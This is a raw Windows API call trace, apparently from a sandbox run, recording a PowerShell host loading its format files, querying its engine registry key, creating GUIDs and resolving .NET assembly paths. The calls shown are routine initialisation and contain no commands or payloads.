	[0159.876] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x13d4f0 | out: lpFileInformation=0x13d4f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0159.876] SetErrorMode (uMode=0x1) returned 0x1
	[0159.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0159.876] SetErrorMode (uMode=0x1) returned 0x1
	[0159.876] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x13d4f0 | out: lpFileInformation=0x13d4f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0159.876] SetErrorMode (uMode=0x1) returned 0x1
	[0159.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0159.877] SetErrorMode (uMode=0x1) returned 0x1
	[0159.877] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x13d4f0 | out: lpFileInformation=0x13d4f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0159.877] SetErrorMode (uMode=0x1) returned 0x1
	[0159.877] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0159.877] SetErrorMode (uMode=0x1) returned 0x1
	[0159.877] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x13d4f0 | out: lpFileInformation=0x13d4f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0159.877] SetErrorMode (uMode=0x1) returned 0x1
	[0159.877] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0159.877] SetErrorMode (uMode=0x1) returned 0x1
	[0159.877] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x13d4f0 | out: lpFileInformation=0x13d4f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0159.877] SetErrorMode (uMode=0x1) returned 0x1
	[0159.877] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0159.877] SetErrorMode (uMode=0x1) returned 0x1
	[0159.878] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x13d4f0 | out: lpFileInformation=0x13d4f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0159.878] SetErrorMode (uMode=0x1) returned 0x1
	[0159.879] CoTaskMemAlloc (cb=0x104) returned 0x2158c0
	[0159.879] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2158c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.879] CoTaskMemFree (pv=0x2158c0) 
	[0159.897] CoTaskMemAlloc (cb=0x104) returned 0x2158c0
	[0159.897] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2158c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.898] CoTaskMemFree (pv=0x2158c0) 
	[0159.899] CoTaskMemAlloc (cb=0x104) returned 0x2158c0
	[0159.899] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2158c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.899] CoTaskMemFree (pv=0x2158c0) 
	[0159.901] CoTaskMemAlloc (cb=0x104) returned 0x2158c0
	[0159.901] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2158c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.902] CoTaskMemFree (pv=0x2158c0) 
	[0159.909] ReadFile (in: hFile=0x308, lpBuffer=0x341ec90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13d188, lpOverlapped=0x0 | out: lpBuffer=0x341ec90*, lpNumberOfBytesRead=0x13d188*=0x1000, lpOverlapped=0x0) returned 1
	[0159.945] ReadFile (in: hFile=0x308, lpBuffer=0x341ec90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13d188, lpOverlapped=0x0 | out: lpBuffer=0x341ec90*, lpNumberOfBytesRead=0x13d188*=0x1000, lpOverlapped=0x0) returned 1
	[0159.960] ReadFile (in: hFile=0x308, lpBuffer=0x341ec90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13d188, lpOverlapped=0x0 | out: lpBuffer=0x341ec90*, lpNumberOfBytesRead=0x13d188*=0x1000, lpOverlapped=0x0) returned 1
	[0159.982] ReadFile (in: hFile=0x308, lpBuffer=0x341ec90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13d188, lpOverlapped=0x0 | out: lpBuffer=0x341ec90*, lpNumberOfBytesRead=0x13d188*=0x1000, lpOverlapped=0x0) returned 1
	[0160.001] ReadFile (in: hFile=0x308, lpBuffer=0x341ec90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13d188, lpOverlapped=0x0 | out: lpBuffer=0x341ec90*, lpNumberOfBytesRead=0x13d188*=0x1000, lpOverlapped=0x0) returned 1
	[0160.019] ReadFile (in: hFile=0x308, lpBuffer=0x341ec90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13d188, lpOverlapped=0x0 | out: lpBuffer=0x341ec90*, lpNumberOfBytesRead=0x13d188*=0x9e2, lpOverlapped=0x0) returned 1
	[0160.038] ReadFile (in: hFile=0x308, lpBuffer=0x341e1da, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x13d188, lpOverlapped=0x0 | out: lpBuffer=0x341e1da*, lpNumberOfBytesRead=0x13d188*=0x0, lpOverlapped=0x0) returned 1
	[0160.056] ReadFile (in: hFile=0x308, lpBuffer=0x341ec90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13d188, lpOverlapped=0x0 | out: lpBuffer=0x341ec90*, lpNumberOfBytesRead=0x13d188*=0x0, lpOverlapped=0x0) returned 1
	[0160.090] CloseHandle (hObject=0x308) returned 1
	[0160.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x13ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.193] SetErrorMode (uMode=0x1) returned 0x1
	[0160.193] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x13d130 | out: lpFileInformation=0x13d130*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0160.219] SetErrorMode (uMode=0x1) returned 0x1
	[0160.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x13ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.219] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d218 | out: phkResult=0x13d218*=0x308) returned 0x0
	[0160.219] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x13d19c, lpData=0x0, lpcbData=0x13d198*=0x0 | out: lpType=0x13d19c*=0x1, lpData=0x0, lpcbData=0x13d198*=0x56) returned 0x0
	[0160.219] CoTaskMemAlloc (cb=0x5a) returned 0x27c890
	[0160.219] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x13d16c, lpData=0x27c890, lpcbData=0x13d168*=0x56 | out: lpType=0x13d16c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x13d168*=0x56) returned 0x0
	[0160.219] CoTaskMemFree (pv=0x27c890) 
	[0160.219] RegCloseKey (hKey=0x308) returned 0x0
	[0160.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x13ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x13cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.248] CoCreateGuid (in: pguid=0x13d440 | out: pguid=0x13d440*(Data1=0x32d06616, Data2=0x8f58, Data3=0x4a01, Data4=([0]=0x97, [1]=0x41, [2]=0x63, [3]=0x1a, [4]=0x69, [5]=0xd7, [6]=0x4b, [7]=0xd6))) returned 0x0
	[0160.323] CoCreateGuid (in: pguid=0x13d440 | out: pguid=0x13d440*(Data1=0xa2846005, Data2=0x68d6, Data3=0x40bd, Data4=([0]=0x94, [1]=0x15, [2]=0x33, [3]=0xd, [4]=0x5e, [5]=0xe2, [6]=0x6, [7]=0x4c))) returned 0x0
	[0160.994] CoCreateGuid (in: pguid=0x13d440 | out: pguid=0x13d440*(Data1=0x5c6bbd25, Data2=0xccdb, Data3=0x45ff, Data4=([0]=0xa9, [1]=0x8d, [2]=0x4a, [3]=0x4, [4]=0x75, [5]=0xdc, [6]=0x7e, [7]=0x49))) returned 0x0
	[0161.020] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x13c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0161.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0161.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x13c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0161.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x13c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0165.289] VirtualQuery (in: lpAddress=0x13bcb0, lpBuffer=0x13cb70, dwLength=0x30 | out: lpBuffer=0x13cb70*(BaseAddress=0x13b000, AllocationBase=0xc0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0165.290] CoCreateGuid (in: pguid=0x13d440 | out: pguid=0x13d440*(Data1=0x6d82350b, Data2=0xb55e, Data3=0x4c17, Data4=([0]=0x8e, [1]=0x67, [2]=0xe0, [3]=0x8f, [4]=0x94, [5]=0x5, [6]=0x57, [7]=0x68))) returned 0x0
	[0165.290] CoCreateGuid (in: pguid=0x13d440 | out: pguid=0x13d440*(Data1=0x1365577c, Data2=0x29d4, Data3=0x4eb5, Data4=([0]=0xa8, [1]=0x77, [2]=0x2f, [3]=0xb3, [4]=0xc6, [5]=0x70, [6]=0xee, [7]=0xb2))) returned 0x0
	[0165.291] VirtualQuery (in: lpAddress=0x13be60, lpBuffer=0x13cd20, dwLength=0x30 | out: lpBuffer=0x13cd20*(BaseAddress=0x13b000, AllocationBase=0xc0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0165.292] VirtualQuery (in: lpAddress=0x13be60, lpBuffer=0x13cd20, dwLength=0x30 | out: lpBuffer=0x13cd20*(BaseAddress=0x13b000, AllocationBase=0xc0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0165.293] CoCreateGuid (in: pguid=0x13d440 | out: pguid=0x13d440*(Data1=0x2cbabd05, Data2=0xde13, Data3=0x4442, Data4=([0]=0x94, [1]=0x66, [2]=0x3e, [3]=0x57, [4]=0x7, [5]=0xad, [6]=0x3a, [7]=0x9c))) returned 0x0
	[0165.296] CoCreateGuid (in: pguid=0x13d440 | out: pguid=0x13d440*(Data1=0x605a0e88, Data2=0x8baf, Data3=0x466e, Data4=([0]=0xba, [1]=0x7d, [2]=0x40, [3]=0x35, [4]=0x6d, [5]=0xec, [6]=0x94, [7]=0x1f))) returned 0x0
	[0165.296] VirtualQuery (in: lpAddress=0x13c0b0, lpBuffer=0x13cf70, dwLength=0x30 | out: lpBuffer=0x13cf70*(BaseAddress=0x13c000, AllocationBase=0xc0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0165.301] VirtualQuery (in: lpAddress=0x13b720, lpBuffer=0x13c5e0, dwLength=0x30 | out: lpBuffer=0x13c5e0*(BaseAddress=0x13b000, AllocationBase=0xc0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0166.291] CoCreateGuid (in: pguid=0x13d440 | out: pguid=0x13d440*(Data1=0xcef8a1fe, Data2=0xdf2d, Data3=0x4ebc, Data4=([0]=0x9e, [1]=0x79, [2]=0x45, [3]=0x86, [4]=0xd1, [5]=0xfb, [6]=0x51, [7]=0x78))) returned 0x0
	[0166.292] CoCreateGuid (in: pguid=0x13d440 | out: pguid=0x13d440*(Data1=0x4383415, Data2=0x1b, Data3=0x4485, Data4=([0]=0xa5, [1]=0x85, [2]=0x4f, [3]=0x8d, [4]=0xff, [5]=0xb1, [6]=0x22, [7]=0xdc))) returned 0x0
	[0166.292] CoCreateGuid (in: pguid=0x13d440 | out: pguid=0x13d440*(Data1=0x430a2259, Data2=0x5837, Data3=0x469f, Data4=([0]=0xbe, [1]=0x79, [2]=0x78, [3]=0xd3, [4]=0x15, [5]=0xc3, [6]=0xb1, [7]=0x67))) returned 0x0
	[0166.293] CoCreateGuid (in: pguid=0x13d440 | out: pguid=0x13d440*(Data1=0xff1e01fb, Data2=0xcd48, Data3=0x43e5, Data4=([0]=0x98, [1]=0x15, [2]=0x1d, [3]=0x43, [4]=0xf7, [5]=0xa1, [6]=0xa6, [7]=0x56))) returned 0x0
	[0166.293] CoCreateGuid (in: pguid=0x13d440 | out: pguid=0x13d440*(Data1=0xff98f3ab, Data2=0x1870, Data3=0x405c, Data4=([0]=0xbf, [1]=0x96, [2]=0xe7, [3]=0x7e, [4]=0xc4, [5]=0x33, [6]=0x50, [7]=0x3e))) returned 0x0
	[0166.293] CoCreateGuid (in: pguid=0x13d440 | out: pguid=0x13d440*(Data1=0xf92e9b24, Data2=0xc9a7, Data3=0x476d, Data4=([0]=0xbb, [1]=0xe3, [2]=0x78, [3]=0xd7, [4]=0x14, [5]=0x88, [6]=0x89, [7]=0xc7))) returned 0x0
	[0166.294] VirtualQuery (in: lpAddress=0x13bdf0, lpBuffer=0x13ccb0, dwLength=0x30 | out: lpBuffer=0x13ccb0*(BaseAddress=0x13b000, AllocationBase=0xc0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0166.295] CoCreateGuid (in: pguid=0x13d440 | out: pguid=0x13d440*(Data1=0x19360e35, Data2=0x1c17, Data3=0x4cf7, Data4=([0]=0x9f, [1]=0x17, [2]=0x76, [3]=0x5, [4]=0xf1, [5]=0x56, [6]=0x4c, [7]=0x3e))) returned 0x0
	[0166.295] VirtualQuery (in: lpAddress=0x13bdf0, lpBuffer=0x13ccb0, dwLength=0x30 | out: lpBuffer=0x13ccb0*(BaseAddress=0x13b000, AllocationBase=0xc0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0166.296] VirtualQuery (in: lpAddress=0x13bdf0, lpBuffer=0x13ccb0, dwLength=0x30 | out: lpBuffer=0x13ccb0*(BaseAddress=0x13b000, AllocationBase=0xc0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0175.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.593] CoCreateGuid (in: pguid=0x13d440 | out: pguid=0x13d440*(Data1=0xc4f1c99a, Data2=0x2bae, Data3=0x45a9, Data4=([0]=0x88, [1]=0x4c, [2]=0xa2, [3]=0x10, [4]=0xf7, [5]=0x73, [6]=0x87, [7]=0xca))) returned 0x0
	[0175.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
